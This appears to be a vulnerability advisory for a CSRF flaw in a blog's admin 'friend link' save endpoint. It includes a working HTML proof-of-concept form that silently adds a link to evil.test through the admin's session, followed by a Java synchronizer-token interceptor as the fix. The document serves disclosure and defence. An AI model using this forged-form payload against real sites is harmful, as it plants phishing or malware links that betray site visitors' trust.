Description
The com.site.blog.my.core.controller.admin.LinkController#save endpoint lacks CSRF protection. This allows an attacker to add "Friend Links" to the website through the admin's authenticated session.
Impact
Attackers can insert malicious links (e.g., to malware or phishing domains) onto the website’s homepage or footer. This exploits the trust of the site's visitors and can be used for malicious SEO backlinking or directing users to harmful external content.
Cause
The link submission endpoint accepts a cross-site POST request as valid whenever the browser attaches the admin's session cookie; nothing ties the request to a form the admin actually loaded, so a page on any other origin can submit it.
Affected endpoint: com.site.blog.my.core.controller.admin.LinkController#save

Arbitrary friend link upload

[Screenshot: Before the attack]

[Screenshot: After the attack]
payload:

```html
<!doctype html>
<html>
<head><meta charset="UTF-8"><title>CSRF – /admin/links/save</title></head>
<body>
<p>Create friend link. POST /admin/links/save.</p>
<form action="http://127.0.0.1:28083/admin/links/save" method="POST">
<input type="hidden" name="linkType" value="0">
<input type="hidden" name="linkName" value="Malicious CSRF Link">
<input type="hidden" name="linkUrl" value="http://evil.test">
<input type="hidden" name="linkDescription" value="Inserted via CSRF">
<input type="hidden" name="linkRank" value="1">
<button type="submit">Send</button>
</form>
</body>
</html>
```
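A defender-side fix for the cause described above, as an added example that is not the project's own code: a Spring MVC interceptor that enforces a per-session synchronizer token on every state-changing request under /admin, so a forged cross-site POST like the payload above is rejected because the attacker's page cannot read the token. It assumes the application is a Spring Boot 2.x app on javax.servlet and that admin form templates embed the token as a hidden `_csrf` field; the package, class and attribute names are hypothetical.

```java
package com.site.blog.my.core.interceptor; // hypothetical package chosen for this example

import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import java.util.List;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;

/** Synchronizer-token CSRF check for state-changing admin requests such as POST /admin/links/save. */
public class CsrfInterceptor implements HandlerInterceptor {

    public static final String TOKEN_ATTR = "csrfToken";
    private static final List<String> SAFE_METHODS = Arrays.asList("GET", "HEAD", "OPTIONS");
    private static final SecureRandom RNG = new SecureRandom();

    /** Returns the session's token, creating it on first use; templates render it as a hidden _csrf field. */
    public static String tokenFor(HttpSession session) {
        String token = (String) session.getAttribute(TOKEN_ATTR);
        if (token == null) {
            byte[] raw = new byte[32];
            RNG.nextBytes(raw);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
            session.setAttribute(TOKEN_ATTR, token);
        }
        return token;
    }

    @Override
    public boolean preHandle(HttpServletRequest req, HttpServletResponse res, Object handler) throws Exception {
        if (SAFE_METHODS.contains(req.getMethod())) {
            return true; // reads change no state; only POST/PUT/DELETE are checked
        }
        HttpSession session = req.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_ATTR);
        // Accept the token from the form field or, for fetch/XMLHttpRequest callers, a header.
        String supplied = req.getParameter("_csrf");
        if (supplied == null) supplied = req.getHeader("X-CSRF-TOKEN");
        // Constant-time compare; a session cookie alone is never enough to authorize the change.
        if (expected == null || supplied == null
                || !MessageDigest.isEqual(expected.getBytes(), supplied.getBytes())) {
            res.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
            return false;
        }
        return true;
    }
}
```

Register it for the `/admin/**` path in a `WebMvcConfigurer#addInterceptors` implementation and have each admin form include `<input type="hidden" name="_csrf" value="...">` filled from `CsrfInterceptor.tokenFor(session)`; the cross-site form in the payload has no way to obtain that value, so its POST now returns 403 instead of creating a link.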